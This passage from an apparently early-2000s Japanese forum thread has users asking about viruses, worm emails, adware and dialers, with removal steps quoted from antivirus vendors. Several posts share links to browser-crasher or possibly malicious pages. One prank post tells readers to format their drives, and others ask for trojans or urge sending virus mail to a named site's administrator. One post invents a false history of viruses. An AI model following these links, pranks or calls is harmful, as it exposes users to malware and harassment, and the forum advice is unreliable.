443 :名無しさん@お腹いっぱい。:03/09/30 00:09
W32.Swen.A@mm なメールが 5通くらい来てる
なんなんじゃ…

444 :名無しさん@お腹いっぱい。:03/10/08 22:57
raus.de/crashme/
これって何でしょうか?
間違って踏んでしまってビビリました。
知っている方いたらお願いしまつ。

445 ://////:03/10/09 00:00
 似たようなのがありました。壊れることはないと思います。
 http://www2.strangeworld.org/uedakana/sahra6137.jpg2:
 http://irvine32.tripod.co.jp/crashme.html
 http://www.hamq.jp/i.cfm?i=03462859


446 :名無しさん@お腹いっぱい。:03/10/09 00:02
suchost.exeがエラーでネットの接続がおかしくなってしまうんですが
どういったものなんでしょうか

447 :名無しさん@お腹いっぱい。:03/10/09 00:08
ファイアウォールで遮断してんじゃないの。

448 :444:03/10/09 00:34
>>445
レス有難うございました。

449 :名無しさん@お腹いっぱい。:03/10/09 00:41
このレスはウィルスに感染しています。
このウィルスは、このスレを開いた瞬間、あなのPCに直ちに感染します。
但し、私の知識不足の結果、このウィルスは「手動式」で作動します。
後生ですから、このレスを見た後に、PCのHDD全フォーマットを行って下さい。

450 :名無しさん@お腹いっぱい。:03/10/09 00:43
>>449
精神科一人で行ける?

451 :名無しさん@お腹いっぱい。:03/10/09 01:27
>>449
HDDの全フォーマットのやり方を解説してください。

452 :名無しさん@お腹いっぱい。:03/10/09 19:13
圧縮ファイルをノートンでウイルススキャンするとHDDの容量が勝手になくなって
いくんですがどうしたらいいでしょうか?


453 :名無しさん@お腹いっぱい。:03/10/11 23:37
>>452
一度解凍しながら検索してるから仕様だ。
検索終了後にもとにもどるべ

454 :名無しさん@お腹いっぱい。:03/10/15 12:58
ウイルスバスターでBKDR EMULBOX.Aっというウイルスを発見しました。
これはどういったウイルスなのですか?

455 :名無しさん@お腹いっぱい。:03/11/01 21:24
ワタシも>>435のように右上の表示が文字化け(1とか2とか数字になってる)
顔文字に使うショボーンの口(鼻?)やハァハァの口など
特定の記号が表示されない
チェックボタンが表示されずリボンのマークみたいなのが出てる
なんなんでしょう?


456 :名無しさん@お腹いっぱい。:03/11/01 22:06
>>455

Windows9x・Me質問スレッド Part33
http://pc2.2ch.net/test/read.cgi/win/1066424896/3


457 :名無しさん@お腹いっぱい。:03/11/01 22:06
>>455です
すいません、解決しました

458 :名無しさん@お腹いっぱい。:03/11/02 04:48
Upってのが削除してもセットアップするたび元の位置に戻ってるんですが、これは何なのでしょうか。対処法を教えてください。



459 :名無しさん@お腹いっぱい。:03/11/02 11:35
windowsを起動すると、pserve25f6っていうプロセスがずっと動きっぱなしなんですけど、問題はないですか?

460 :名無しさん@お腹いっぱい。:03/11/02 20:12
送り主 マイクロソフト
本文、英語
添付 patch.exe
これなーに?


461 :名無しさん@お腹いっぱい。:03/11/02 20:46
、「W32.Spybot.Worm」っていうのに感染してしまいました。
そしてノートンなどで駆除しようと思ったんですが、スキャンしても何も見つけられませんでした。
どうすればいいのでしょうか?


462 :名無しさん@お腹いっぱい。:03/11/02 20:47
>>461
どうしてウイルスに感染したって分かったのかな?
警告のときの状況を詳しく書け。

463 :名無しさん@お腹いっぱい。:03/11/02 20:49
>>462
ノートンから警告があったんです。
MXをやってるときなんですが・・・

464 :名無しさん@お腹いっぱい。:03/11/02 20:53
>>463
何かしてるときいきなしノートンがウイルス警告してきたってこと?

465 :名無しさん@お腹いっぱい。:03/11/02 20:55
>>464
そうなんです。それで駆除しようと思いスキャンしたんですが何も見つからなくて・・・。
ウィルスのファイルの場所などはわかってるんですけど、スキャンで見つけなければ駆除できないので困ってます(T.T)

466 :名無しさん@お腹いっぱい。:03/11/02 20:57
readnow.zipってのが添付されたメールが2通届いたんだけど情報有ります?
中にはreadnow.doc.scrってのが入っててこれはUPXで圧縮されてるみたい。

467 :名無しさん@お腹いっぱい。:03/11/02 20:59
>>465
ウイルス対策ソフトが突然ウイルス警告してきた!→
マシンがウイルスにやられちゃった!×
ウイルスを自動的にブロックして警告○
…という意味なので問題なし。よかったね。ノートンが守ってくれたんだよ。

念のためマシン全体をウイルススキャンして見つからなければ
問題なし。

468 :名無しさん@お腹いっぱい。:03/11/02 21:02
>>467
いえ、まだいるみたいなんです。
再起動してもまた警告してきましたから

469 :名無しさん@お腹いっぱい。:03/11/02 21:03
>>468
フォルダオプションで隠しファイル表示させてみれば?

470 :名無しさん@お腹いっぱい。:03/11/02 21:04
>>469
やっぱいました・゚・(つД`)・゚・

471 :名無しさん@お腹いっぱい。:03/11/02 21:06
ノートン無効にしてたことあったか、更新してないんじゃないの。

472 :名無しさん@お腹いっぱい。:03/11/02 21:07
まあ、最大の理由は「MXをやってる」って事だろ。
自己責任でやれ。

473 :名無しさん@お腹いっぱい。:03/11/02 21:44
>>466
http://www.symantec.com/region/jp/sarcj/data/w/w32.mimail.d@mm.html

474 :名無しさん@お腹いっぱい。:03/11/02 22:04
>>466

おれんとこ 50通くらい来た、、


475 :名無しさん@お腹いっぱい。:03/11/03 01:45
このスレ ウィルスです。

476 :名無しさん@お腹いっぱい。:03/11/03 21:27
>>474

俺のところも通算で50通以上は来てる・・・
相当うざい。

しかも全て韓国経由・・・
あの国はどうなってるんだ?

477 :名無しさん@お腹いっぱい。:03/11/04 00:17
>>476

大量に来るので、件名でフィルタかけて
受信拒否設定しました。


478 :名無しさん@お腹いっぱい。:03/11/04 11:08
□□□□□□□■■■□□□□□■□□□□□□□□□□□□
□□■■■■■□□□□□□□□■□□□□□□□□□■□□
□□■□□□■□□□□□□■■■■□■■■■□□□■□□
□□■□□□■□□□□□□□□■□■□□□□■□□■□□
□□■□□□■□□□□□□□□■■□□□□□■□□■□□
□□■■■■■■■■■□□□■■□□□□□□■□□■□□
□□■□□□□■□□□□□□■■□□□□□□■□□■□□
□□■□□□□■□□□□□■□■□□□□□□■□□□□□
□□■□□□□□■□□□□■□■□□□■■■■□□□□□
□□■□□■■□□■□■□□□■□□■□□□■□□■□□
□■■■■□□□□□■■□□□■□□□■■■□■□□□□

これだ
http://66.7.65.90/sou/bbs/

479 :名無しさん@お腹いっぱい。:03/11/04 18:09
漏れぜんぜんこないんだけど?
他人のメルアド帳に載ってないとか(悲

480 :名無しさん@お腹いっぱい。:03/11/04 21:05
>>479
『他人』を『ウィルスに感染するような間抜け』に置き換えれば悲しむ必要なし。

481 :名無しさん@お腹いっぱい。:03/11/05 23:53
朝5時以降のメールを今受信したんだが
俺のところは72通で1M以上になってた・・・
迷惑以外の何者でもないぞ・・・これは

ひょっとしてあの国はわざと日本を狙ってウイルスメールをばら撒いてるのか?

482 :名無しさん@お腹いっぱい。:03/11/07 21:13
john(>>473)がすげーうざいんだけどあまり話題にならないのは
ごく少数の人がごく少数の人に大量に送りつけてるだけなんだろうか・・・

483 :名無しさん@お腹いっぱい。:03/11/08 17:40
>>482

俺はいろんな登録に使っているアドレス一つに集中して来ている。
メインアドレスには全然来てないので
そういうつまらないところから漏れたアドレス宛に大量に送ってるんだろう。
某隣国から

484 :名無しさん@お腹いっぱい。:03/11/12 16:36
実家のマシンなので実際に見たわけではないのですが、
> 5〜6分してマウスを動かす瞬間に、SPから大きな爆発音がして何も動かなくなる。
> 場合によっては、再起動不能です。
と、いった症状が出ています。
最新のウイルスパターンでの検索でも検出はされなかったとのことです。
些細な情報でもかまいませんので、ご存知の方がいらっしゃいましたら
是非おしえてください。
よろしくお願いします。

485 :名無しさん@お腹いっぱい。:03/11/13 01:58
>>460さんと同じとこかな?
添付付のメールが同じ時間に10通近く届いている。
自分はmacユーザーなんだけど全部マイクロソフトのタイトル付き。

FROM: "Microsoft Public Assistance" <zzrarmu@technet_msn.net>
TO: "MS Corporation Partner" <kxxgv@technet_msn.net>
SUBJECT: Internet Critical Update

FROM: "MS Security Services" <dvsebbviubhmx@advisor.ms.net>
TO: "Client" <dxlbkfl_dodwczwbg@advisor.ms.net>
SUBJECT: Last Security Patch

FROM: "Admin" <xmaildaemon@rocketmail.com>
TO: "Mail User" <recipient@mailserver.com>

FROM: "Microsoft Corporation Security Assistance" <gtmulwrbcpahsu@updates.msdn.com>
TO: "Consumer" <kinkxkg@updates.msdn.com>
SUBJECT: Internet Security Patch

installerなんとかとかそういう添付がイパーイついてます。


486 :名無しさん@お腹いっぱい。:03/11/13 02:09
タスクで hot_jp.exe っていうのが動いてるんですけど
これってウィルスですか?

487 :名無しさん@お腹いっぱい。:03/11/18 18:12
カーネル32っていうウイルスに感染してしまいました。
このウイルスの情報を教えて下さい。


488 :名無しさん@お腹いっぱい。:03/11/18 21:09
>>487
自分で調べろ ヴォケ

489 :名無しさん@お腹いっぱい。:03/11/19 22:09
Trojan.IframeExec(感染ファイルは拡張子全て.tem)
V2Px.1190(状態は亜種ウイルス)
いちど検査してみたらこのように出てきました。
この二つってウイルスなんでしょうか・・・
教えてください。


490 :名無しさん@お腹いっぱい。:03/11/20 08:12
>>489
おまいも自分で調べろ
トレンドかノートソのページに辞典あるから

491 :kinbass:03/11/25 20:32
hot_jpについて退治方法をお知らせします。
ProgramFiles¥gmsoft¥dialers\hot_jp
に潜んでいますのでこいつを削除してください。
その前に、一時ファイルの削除をし、
start up状態になっていますので
これを解除してからやった方がいいと思います。
とにかくやばいサイトには近づかんほうが・・・・・。



492 :多謝:03/11/28 17:31
>491さん

486ではないですが、先程、俺が最近使ってないパソコンをつけたら変なアイコンが
画面右下に出ていたので、検索したらここに着きました。
これはウイルスだったのですか。
どちらにしても無事に消せたので偶然ですがありがとうございます。>□<シ



493 :多謝(続き:03/11/28 17:43
ちなみにコレ親のパソコンなんですけど
俺のデータもドライブの中に少し入った状態なのですが、
hot_jpってデータが消えるようなウイルスですか?
入ってるのはタイピングソフトくらいですが、
授業用のレポート(結構な枚数)を貯めたところとかに影響があると痛い。

494 :名無しさん@お腹いっぱい。:03/12/01 19:36
レッドロフに感染してしまい、駆除はしたんですが、
ファイルのweb表示が出来なくなってしまいました。

再セットアプ以外に何かリカバリーする方法ないんすか?

495 :名無しさん@お腹いっぱい。:03/12/01 19:38
ttp : // cml.harvard.edu/ ~andrew/ jo0349227.pdf
これなんですがなあに?
ドキドキ...

496 :名無しさん@お腹いっぱい。:03/12/01 23:49
最近、変なメールが頻繁に届いてて、
添付ファイルのクリップマークじゃなく、
イクスクラメーション(ビックリマーク)が付いた英文字タイトル付きメールが届くんだよね。
例えば差出人名が『David』で題名が『k』だけ、とか…
で、大体17kbほどのものなんだけど…
これってウィルスメールの一種なのかなぁ…

497 :名無しさん@お腹いっぱい。:03/12/01 23:58
最近ウイルスバスター2004のアップデートがエラーになるのでおかしいな!?
と思い、トレンドのWEBで確認しようと思ったら繋がらないんです。
トレンドマイクロやシマンテックなどのページだけ見れないんです。

これってやられてるんでしょうか。



498 :名無しさん@お腹いっぱい。:03/12/02 00:27
>495
ウイルスではありませんでした

499 :497:03/12/02 00:58
WindowsのUpdateもできなくなっています。
うみゅ〜


500 :名無しさん@お腹いっぱい。:03/12/02 05:39
>>499
そんな古いウイルスに感染する人っているんだね

501 :名無しさん@お腹いっぱい。:03/12/02 16:56
>>496
私も全く同じです。
さっきセキュリティ初心者質問スレへ書き込んだところですが
何なのでしょうね?

502 :名無しさん@お腹いっぱい。:03/12/02 22:51
JAVA_BYTVERIFY.A
に感染した人いますか?

503 :496:03/12/03 02:50
>>501さんのところにも届きましたか!
自分とこには、この手のメールが
ほぼ毎朝3通、立て続けに送られてくるんですよね。
何だか添付ファイル付きのウィルスメールが来るより、
返って不気味というか何というか…って感じですよ(苦笑)

504 :497:03/12/03 22:30
>>500
だったら 情報教えて ちょ
オンラインスキャンも繋がらないし、バスターの2004の11月末のパターンでも
見つからないの。


505 :名無しさん@お腹いっぱい。:03/12/13 16:10
winny系ウイルスと思われるフォルダをあやまって実行。
ぬるぽ.txtがデスクトップ上にばらまかれ、
スタートメニューからプログラムアイコンが全て消え、プログラム自体ショートカットからも起動できず、
「Windowsのファイルが置き換えられた」エラーで訂正しようにもCDを「異なるディスク」と認知せず、
挙句に再起動後マスターブートレコードがイカれて修復コンソールでも修正できなかった。

これウイルス???


506 :あゆみ:03/12/15 20:30
あのー・・・。何かHPあるからクリックしたら変なえろサイトだったんです。そんでなんか消えなくて強制終了してもそれ用のが作られててゴミ箱移しても消えないんです・・・。しかもインターネットつなぐと最初がそのエロサイトから出るし。。。これゎウィルスなんでしょうか?

507 :名無しさん@お腹いっぱい。:03/12/15 20:53
えろいからだ!

508 :名無しさん@お腹いっぱい。:03/12/15 21:21
>>506
自業自得
自分でタネまいたんだから自分で直せ

509 :あゆみ:03/12/15 21:36
それがゎかんなぃからきいてんですけどー。゚(゚ノД`゚)゚。

510 :名無しさん@お腹いっぱい。:03/12/15 21:53
>509
ツール→インターネットオプション→ホームページってところを検索サイトでもなんでもいいから書き換えろ
あと完全削除のフリーさがせ どこでもある。
>505
歳インスコ


511 :あゆみ:03/12/15 22:19
ぁりがとうございましたぁ


512 :名無しさん@お腹いっぱい。:03/12/15 23:39
ウィンドウの拡大ボタンやなど右上の3つのボタンや、
矢印、チェックボックスなどあらゆるものがなんか変な記号に変わってしまいました。
思い当たるのは、メールでもらったバースデイカードがあるのですが、
そのファイルを開いてから、変な風になってしまいました。
トレンドマイクロのオンラインウィルスチェックでも検出されなくて、
どうすればいいか困っています。
もしよろしければ、誰か対処法を教えてください。

513 :名無しさん@お腹いっぱい。:03/12/16 00:05
>512
コントロールパネル→画面 で設定変えてみ
無理ならググレ てきとーに

514 :名無しさん@お腹いっぱい。:03/12/16 00:05
>>512
フォントキャッシュを削除しる!

515 :名無しさん@お腹いっぱい。:03/12/16 00:10
>>513
>>514

御丁寧にありがとうございます。さっそくやってみます。

516 :名無しさん@お腹いっぱい。:03/12/16 10:12
トレンドマイクロいってオンライン駆除?みたいなのしたら
とんでもないことに・・
PE_PARAITE.A-1が発見されて駆除可能のところが「いいえ」になっとる・・
PE_Paraite.Aは、駆除可能のとこが「はい」になってるが460個くらい
でまつ・・。
どうしたらいいのでしょうか・・HELP!!

517 :名無しさん@お腹いっぱい。:03/12/17 00:24
>>516
自業自得。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=PE_PARITE.A

とりあえず体験版インストールして全スキャンで駆除できると思うけど、
これを機会にウイルス対策ソフトの導入を検討しる!

518 :電算担当のボヤキ:03/12/17 01:34
>>517
禿同!
そしてウィルスにやられたカモでここに書き込む前に自分で調べる!
少なくともログは読め!

それとな・・・既出になるが大事なことだ
安易にメールをプレヴューすんな!(プレヴュー機能はOFFが鉄則!)
複数の拡張子を持つファイルなんか触るな!(jpg.***やmp3.***の類はマズ疑え!)
セキュリティソフトは必ず導入!(ルーターがあってもXPでもFWは必要!)
セキュリティパッチは必ず行う!
ファイルをもらった>ウィルススキャン を習慣づける!
鯖消し機能のあるメーラーの導入を検討する!

感染に気がついたらネットワークから隔離しろ!
昔の人はええこと言うた。「やられたと思ったら、線を抜け」

519 :名無しさん@お腹いっぱい。:03/12/17 01:44
>>518
よほど社内でご苦労されておられるようでつね ・゚・(つД`)・゚・

520 :名無しさん@お腹いっぱい。:03/12/17 02:27
Xtemeと言うのはウイルスですか?
PCを立ち上げて、しばらくすると

Would you like to keep redialing?

と言う文が出てきます。



521 :名無しさん@お腹いっぱい。:03/12/18 16:42
携帯電話のネットウイルスで、接続したら携帯がアボーン(電源もはいらない)
というウイルスがあるらしいですが本当ですか?

522 :516:03/12/18 17:25
>>517
>>518
どうもでした!!
体験版でなんとか駆除、隔離することができました!
バスターがこんないいものとは・・・
ウイルスなんて大丈夫だと甘く見てたらだめでつね。
教訓になりまつた!

523 :名無しさん@お腹いっぱい。:03/12/18 19:20
>>522
世間でこんなに 騒がれてるのに・・・( ゚Д゚)ポカーン

524 :名無しさん@お腹いっぱい。:03/12/20 03:51
ノートPC売りたいのですがHDD復元されるのが怖いです。。。
お金ないのでなんかいいソフトないですか?

ってかHDD全消去してくれるウィルスあったよね?
おいときゃよかった・・・。どっかにアーカイブないかな?

525 :名無しさん@お腹いっぱい。:03/12/20 14:59
>>521
俺の知り合いの、日本で5本の指に入るハッカーに聞いたら、あるそうです(w

526 :名無しさん@お腹いっぱい。:03/12/22 00:17
みなさんよろしくお願いします!
シマンテックのオンラインスキャンを実行した所
16個のファイルが感染していました。
それが全部ギコナビのログなんですけど
これって大丈夫なんでしょうか?

527 :第17使徒ゲパチエル:03/12/23 10:41
トロイの木馬転送方法教えろヽ(`Д´)ノ

528 :また〜り伯爵:03/12/23 10:43
((((;゚Д゚)))ガクガクブルブル

529 :名無しさん@お腹いっぱい。:03/12/23 22:03
>>525
俺の尻愛の、2本と5本の指が入るオカマーに聞いたら、やられたそうです(w

530 :名無しさん@お腹いっぱい。:03/12/28 00:57
>>524
フリーの消去ツール(上書きツール)で消しとけ
どこにでも転がってるぞ

>>517
トロイが何かわかってないようだな

531 :Hot_jpが消えない:04/01/12 10:42
>491のkinbassさんの
 ProgramFiles¥gmsoft¥dialers\hot_jp
 に潜んでいますのでこいつを削除してください。
という情報を得てプログラムという名のところを片っ端から
調べて、ついでにスタートメニューからも消し去ることが
でき喜んでいたのですが肝心のアプリケーションの追加と削除を
みると残っており、消そうとしても消えず、症状も改善しません。
あとどこを見たらよいのでしょうか?

 追伸、>491の後半に書いている。
 その前に、一時ファイルの削除をし、
start up状態になっていますので
これを解除してからやった方がいいと思います
という意味が今ひとつ分かっていません。
一時ファイルはどこから消すのでしょうか?
それともこれでは根本問題は解決してないのでは
ないでしょうか?
 

532 :名無しさん@お腹いっぱい。:04/01/12 10:54
マスターブートレコードとブートレコードに二匹ウイルスが入ってしまいました・゚・(ノД`)・゚・。
今までファイル感染しか駆除したことなくて方法がさっぱりわかりません…(´・д・`)
検索かけたらなんかの駆除ファイルが必要なのかな?
誰かお力添えをお願いします。

533 :名無しさん@お腹いっぱい。:04/01/12 15:17
今年の3月まで無料で駆除できるサイトがあるけど…
出来ればあんまし教えたくない

534 :名無しさん@お腹いっぱい。:04/01/22 16:31
Bloodhound.Packed という、ウイルスに知人がかかったらしいのですが、
シマンテックをみると

ttp://securityresponse.symantec.com/region/jp/sarcj/cgi-bin/virauto.cgi?vid=18974

何も詳細書いてありません。 コイツは何者なのでしょうか?

535 :名無しさん@お腹いっぱい。:04/01/22 17:13
>>529
俺の知り合いの、日本で5本の指に入るネカマーに聞いたら、オネエ言葉で返事が来たそうです
「知らないわぁ〜」(w


536 :名無しさん@お腹いっぱい。:04/01/23 22:26
>>534

ほぼ100%既存ウイルスの亜種の可能性が大。
金払ってるんだから、送って解析してもらえ。


537 :名無しさん@お腹いっぱい。:04/01/23 22:28
>>536
連続ですまん。情報は英語だが載ってるぞ

ttp://securityresponse.symantec.com/avcenter/venc/data/bloodhound.packed.html



538 :534:04/01/24 11:53
>>537
ようは、わけわからんがウイルス臭い、いやウイルスかもってことですね。
有難う御座いました。

539 :名無しさん@お腹いっぱい。:04/01/25 04:11
AVGでウイルス駆除をしたのにTROJ_SMALL.AA*TROJ_ISTBAR.K*TROJ_IEFEATS.A
というのが駆除できません。駆除の仕方を教えていただけませんか?

540 :名無しさん@お腹いっぱい。:04/01/25 14:53
>>539
TROJ_SMALL.AA
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_SMALL.AA

TROJ_ISTBAR.K
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_ISTBAR.K

TROJ_IEFEATS.A

ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_IEFEATS.A

ちったぁ検索しようや


541 :名無しさん@お腹いっぱい。:04/01/26 02:31
上の3つのウイルスはウイルスバスターの体験板で駆除できますか?

542 :名無しさん@お腹いっぱい。:04/01/27 10:02
>>541
体験版は知りません。 リンクに手動での削除の仕方が書いてるのでそれを実行してください。

Trojan.Downloader.Small.aa

・感染していた場合の対処:
最新のバージョン(エンジン、パターンファイル)のウイルス対策
プログラムを利用してウイルス検索を行い「TROJ_SMALL.AA」で検
出したファイルをすべて「削除」してください。
Windows検索などを用いて、"COMLOAD.DLL"を検索、削除してください。

TROJ_ISTBAR.K

対応方法:
Scan your system with your Trend Micro antivirus product.
NOTE all files detected as TROJ_ISTBAR.K.
 ↑ようは感染してると出たファイルを全部削除しろってこと



543 :名無しさん@お腹いっぱい。:04/01/27 10:07
>>541
>>541
TROJ_IEFEATS.A
手動削除手順:
まず、実行しているブラウザをすべて閉じます。
不正プログラムのファイル名を確認します。 最新のウイルス対策プログラムを利用してウイルス検索を行い、「TROJ_IEFEATS.A」として検出したファイル名を確認してください。(ウイルス発見時の処理は「放置」にすることをお勧めします)
メモリ上で実行されているツールを終了します。下記方法でタスクマネージャーを起動し、手順1)で確認した名称のプロセスを終了します。
 Windows 9x/ME:CTRL+ALT+DELETEキーを同時にクリック
 Windows NT/2000/XP:CTRL+SHIFT+ESCキーを同時にクリック
Internet Explorer の設定を初期化します。
Internet Explorerのウィンドウをすべて閉じます。
 [コントロールパネル]-[インターネットオプション]を開きます。
 [プログラム]タブ内の[Webの設定のリセット]をクリックします。
 [ホームページもリセットする]にチェックを入れ、[はい]をクリックします。
 以前ご使用のスタートページを設定してください。
作成されたファイルを削除します。 Windows検索などを使用して以下のファイルを削除します。
 IEFEATSL.DLL
 MSIESH.DLL
 SUBMITHOOK.DLL
 UNINSTALL.EXE
 UNINSTALL.INI
 MSHP.DLL
不正プログラムの自動起動設定を削除します。 Windowsのレジストリエディタ(regedit.exe)などを使用して以下の レジストリの値を削除してください。
 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce
 値:
  iefeatslUpdate = "rundll32 <不正プログラムのパス>\iefeatsl.dll,UpdateDlls"
  コンピュータを再起動し、最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。このワームは「TROJ_IEFEATS.A」と検出します。検出したファイルはすべて削除してください。

この程度の事が出来ないなら、今後のサポートを期待してウイルスバスターなりなんなりを購入すれば良いと思います。 それかこの程度の事が出来るように精進して下さい。

544 :名無しさん@お腹いっぱい。:04/01/30 04:31

踏んでしまいました。
ttp://www.findthewebsiteyouneed.com/vm/archive.jar



545 :名無しさん@お腹いっぱい。:04/02/01 02:16
ルーターログから、端末台数以上にMACアドと、your−○○○○のPC名が
あるのですがなにか、かかってまつか。。。

546 :名無しさん@お腹いっぱい。:04/02/04 03:01
文字を変換すると高い割合で「ボンヌ」と出てくるんですが何かにかかってるんでしょうか?

547 :名無しさん@お腹いっぱい。:04/02/05 21:52
誰かウィルスください。
しかも強力なやつ・・・

548 :名無しさん@お腹いっぱい。:04/02/05 22:41
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice
ofiice


549 :名無しさん@お腹いっぱい。:04/02/06 02:05
システムボリュームインフォメーションってフォルダにウイルスが
おるってでるんだけど、そのフォルダが見つからない!
ウイルス名はwormのbereb.A!
誰か助けて(泣

550 :名無しさん@お腹いっぱい。:04/02/06 02:13
2ちゃんの墓ーへ
http://xf.xtend.co.jp/xcgi/x.cgi?97534
↑このサイトの管理人にウイルスメルー送ってくり

551 :名無しさん@お腹いっぱい。:04/02/06 03:48
>>549
どうやって見つけたのか書こう。まずはそれから。

552 :549:04/02/07 01:51
P2Pでbritney nude.exeというファイルを落としたら
起動してもいないのにかかってしまいました。
全ファイルをスキャンしても見つからない…
んで、ときどきいきなり警告がでてくる!
もう意味わかんないです…

553 :名無しさん@お腹いっぱい。:04/02/07 01:51
おふぃすまんせー おふぃすまんせー おふぃすまんせー
おふぃすまんせー おふぃすまんせー おふぃすまんせー
おふぃすまんせー おふぃすまんせー おふぃすまんせー
おふぃすまんせー おふぃすまんせー おふぃすまんせー
おふぃすまんせー おふぃすまんせー おふぃすまんせー
おふぃすまんせー おふぃすまんせー おふぃすまんせー
おふぃすまんせー おふぃすまんせー おふぃすまんせー
おふぃすまんせー おふぃすまんせー おふぃすまんせー
おふぃすまんせー おふぃすまんせー おふぃすまんせー
おふぃすまんせー おふぃすまんせー おふぃすまんせー


554 :名無しさん@お腹いっぱい。:04/02/13 19:28
17、18分後に切断され、
再起動しないとネットに繋がらない状態に置かれてるのですが・・・
これってウイルスなんでしょうか?

555 :名無しさん@お腹いっぱい。:04/02/20 19:50
ccApp
↑このプログラム何だ?
PC切る時に必ず応答していませんと出るのだが

556 :名無しさん@お腹いっぱい。:04/02/20 19:56
環境かいとけ.

557 :名無しさん@お腹いっぱい。:04/02/20 20:02
amilalaってなんでしょうか?
踏んでしまいました・・・

558 :名無しさん@お腹いっぱい。:04/02/20 20:09
>>557
amilalaのも亜種がでたからね。
amilalaオリジナルも亜種もHDDにゴミファイル大量に作ったうえ、レジストリ書き換えだった気がする。

559 :こんぱす ◆mwTp3GGGBk :04/02/20 20:16
>>556
環境は
■ RAM : Total 253.984MB / Free 94.199MB
■ OS : WindowsXP - Home Edition / Version 5.1 / ( Build 2600 / Service Pack 1 )
■ User Name : 表示できませんよ(´,_ゝ`)
■ Boot Mode : Normal Boot

560 :第17使徒ゲパチエル ◆CgRMNK8cWw :04/02/20 21:23
っか
基本的に
ウィルスは元々アメリカのデイン=フォーカスがPCのアップデート用に開発した
データがウィルスだったがそれを使った奴等のPCが逝ったのでウィルスは
PCを破壊する物と言う事になってしまった

561 :557:04/02/20 23:06
>>558
なんかやばそうですね
ノートンはいってるんですが、ウイルスチェックする度にブートレコード警告が出て
ブートレコードに変更があったといわれます。
amilalaとやらが関係してるんですかね・・・・
スキャンしたけどウイルスは見つかりませんでした
このままほっといて大丈夫でしょうか?

562 :名無しさん@お腹いっぱい。:04/02/20 23:19
>>561
危険だって。
まヂ危険
なんとかした方がいいよ
検疫してあるの?
予防接種とか・・・・
何か入れた方がいいよ

563 :名無しさん:04/02/21 00:31
IEを開くとC\WINDOWS\secureが開いてIEが使えません
画面は英語でこのソフトを買え!みたいな事を言われます
WINDOWSフォルダのsecureファイルを削除するとシステムの異常と出ます
OSはMeです

これってウイルスですか?ノートンでは素通りでした

564 :名無しさん@お腹いっぱい。:04/02/21 11:39
549
552

565 :名無しさん@お腹いっぱい。:04/02/22 01:17
今まで一度もウイルスなんてかかったことなかったんですが
先日Whiterにうっかり引っかかりHDDの一部が消えてしまいました。

それで知識として知っておきたいのですが
こういったHDD消去系のウイルスでデータが消えてしまったものは
リカバリーソフトで復旧することは可能なのでしょうか?
ウイルス自体が凶悪なのでもう戻せないものなのでしょうか?

教えて頂けると幸いです。

566 :名無しさん@お腹いっぱい。:04/02/22 02:02
>>565
消されただけなら復旧できる可能性はあるが、
whiterは上書きするので復旧はほとんどできない。

567 :565:04/02/22 04:10
>>566

やはり復旧できないんですね。
セキュリティ意識向上のいいきっかけになりました。
お答えありがとうございました。

568 :名無しさん@お腹いっぱい。:04/02/22 10:10
>>561
2ch で俗に amilala と言われているものには、Norton は一部の古い型にだけ 1月中旬に Trojan Horse のひとつとして対応。
VB が 1月に JS_AMILALA.A として対応しているのは、いわゆる amilala とは全く別物のファイル・フォルダ削除 VBS。これは実行前に警告・確認が出るが、いわゆる amilala は警告なしに強制実行される。
最新 amilala には Norton も VB も全く反応しない。そもそも amilala は Virus でもTrojan でもなく、大したことのないごく軽い Exploit。実際、昨年秋の出現以降、各社とも根本的に対応する気配は見られない。
実行内容は PC環境・タイミングによりさまざま。最悪のシナリオではA-Zドライブ内容全消去 & フォーマット。時限発症・MBR 改竄については不明だが、OS 再インスコでも完全には復旧不可能なケースも実際に出ている。
Web 版は普段はごく軽いブラクラになっているか無害の場合が多い。米国 Yahoo chat に出入りしているのでない限り遭遇する可能性は低い。Yahoo側も特に経営に影響はないのでこれを無視。

569 :test:04/02/26 18:55
test

570 :名無しさん@お腹いっぱい。:04/02/29 08:19
踏んでしまいました。
ttp://www.thepaymentcentre.com/holistycLite/iFrame.aspx?holistycId=333&serviceType=ppv&countryCode=Japan&downloadId=54988394

571 :あぼーん:あぼーん
あぼーん

572 :名無しさん@お腹いっぱい。:04/03/02 15:54
ttp://www.uploda.net/anonymous/etc/upload3277.gif
これ踏んだら、ウイルスをダウンロードしますになったのだけど
何のウイルスですか?

573 :あぼーん:あぼーん
あぼーん

574 :名無しさん@お腹いっぱい。:04/03/03 16:17
572
拡張子がgifな時点でウイルスではない

無害だよ

575 :名無しさん@お腹いっぱい。:04/03/03 17:48
mpgとかmp3のファイルが
mpg .exe
mp3 .exe
とかに変換されて壊れちゃうんですが何ですかね?
msime2002ってのが勝手に起動されるようになっちゃったんでこれが怪しいと思うんですが。。。


576 :572:04/03/03 20:30
>>574
お答えありがとうございます。

577 :名無しさん@お腹いっぱい。:04/03/03 22:47
>>572 動画gifで作られたジョーク画像。とは言っても自分も一瞬ビビッタけど
>>574 拡張子が偽装の場合もありますよ。自分はとりあえずダウンロードしてバイナリエディターで開いて
    問題無かったら開きます。それでもビビッタけどね。。。
    

578 :名無しさん@お腹いっぱい。:04/03/04 21:13
ttp://amilala.blogspot.com
これ踏んだらブラクラだったんだけど、
560あたりで言ってるamilalaですよね。ウイルス感染するんですか?

579 :名無しさん@お腹いっぱい。:04/03/04 22:23
ついさっきWhiterにやられました><
上に消されただけなら復旧できる可能性はあると書かれているのですが
復旧を試すのはどういったリカバリーソフトでやればいいのでしょうか?!
どなたか教えて下さい!お願いします><

580 :名無しさん@お腹いっぱい。:04/03/04 22:29
下記のようなへんなメールが来てこわいんですけど、これはウィルスでしょうか
教えて下さい(メアドなど部分的に削除してます。)
--- A copy of your original message is below the Japanese ---
*どうぞ始めにお読みください*
*なたたのメッセージを確認致しました*
(これは自動的に配信されたメッセージです)
連絡ありがとうございます。
突然ですがあなたのメッセージはまだ受取先に
届いていない状態にあります。
(セキュリティーの為)
お手数ですが、あなたからのメッセージと確認できる為にも
サーバーが指定致しました
